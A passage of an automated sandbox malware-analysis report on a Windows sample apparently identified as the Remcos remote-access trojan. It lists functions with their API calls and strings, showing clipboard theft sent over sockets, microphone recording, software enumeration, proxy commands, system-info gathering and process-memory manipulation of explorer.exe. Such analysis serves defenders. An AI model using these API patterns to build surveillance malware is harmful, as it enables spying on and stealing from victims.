                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C68F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                • DisplayName, xrefs: 0041C73C
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID: PkGNG
                                • API String ID: 1324828854-263838557
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040186A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 142threadCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: 0jU$PkG$XMG$NG$NG
                                • API String ID: 1649129571-2736300130
                                • Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\microsofts\svcs.exe), ref: 0040749E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
